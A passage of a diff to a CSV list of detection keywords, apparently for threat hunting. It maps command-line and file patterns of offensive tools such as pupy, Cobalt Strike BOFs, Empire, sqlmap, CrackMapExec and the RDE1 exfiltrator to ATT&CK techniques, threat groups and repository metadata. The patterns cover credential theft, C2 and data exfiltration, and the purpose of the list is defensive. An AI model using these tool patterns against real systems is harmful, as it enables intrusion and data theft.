- T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* pupyx64.lin*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* push_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* putterpanda.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* Pwn3d!*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* pyasn1 *","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* pyasn1.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" @@ -1566,74 +1566,74 @@ "* quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2463","459","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "* radare *:* -ble*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "* rai-attack-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* rai-attack-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* --random_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "* rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "* -ratel *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* RCE.py -*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ReadFromLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* -RealCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "* realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "* --reflective-injection *","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -relayserver *:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in 